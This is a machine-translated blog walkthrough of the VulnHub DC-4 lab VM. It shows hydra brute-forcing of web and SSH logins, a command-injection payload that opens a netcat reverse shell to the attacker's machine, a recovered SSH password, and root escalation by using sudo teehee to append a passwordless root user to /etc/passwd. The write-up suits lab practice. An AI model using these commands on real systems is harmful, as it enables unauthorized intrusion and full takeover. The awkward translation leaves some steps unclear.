【Try to Hack】vulnhub DC4

Blog home page ： Happy star The blog home page of
Series column ：Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 7 month 1 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

The target is in bridging mode by default

kali Set to bridge mode

The host found
netdiscover

Drone aircraft ip by 192.168.0.151

namp -p- -A 192.168.0.151

ssh Service and http service

visit 80 port

dirb Regular directory scanning
dirb http://192.168.0.151

Two directories 403

whatweb http://192.168.0.151

This page doesn't work cwel Crawl dictionary

Upper weak password
On hydra, use john A dictionary with me /usr/share/john/password.lst

Known user name is admin
hydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /



Can execute orders , But the command is dead
Grab the bag and have a look

Yes indeed

Bounces shell
radio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run

nc -lvvp 233
Pack

python -c 'import pty;pty.spawn("/bin/bash")'
Get an interactive shell

ls /home
There are three users

Turn over one by one
Only jim Can see


Password

Continue to turn jim Other documents under

No permission to view mbox

Now look ssh service

Then save the three users as user.txt.
I directly copied the password backup file to kali In the attack plane
use hydra Blast ssh service
hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60

ssh Blast out a user
jim:jibril04
Log in and have a look
ssh [email protected]

Login successful
You can see mbox

This is email ,root to jim Email sent , But there is no email content
stay /var/jim Found inside .（ This /var/mail Is the default self-contained folder , It may be used to save emails ）

Got it charles Password
Log in


nothing

Now we can only consider raising the right
To us charles This user , Then use this user to raise rights

test.sh have suid jurisdiction , But I don't know when it will run , I haven't seen it work .

First, consider using ping Raise the right , But it doesn't seem to work

use sudo
sudo -l


echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Construct a user with root jurisdiction , write in /etc/passwd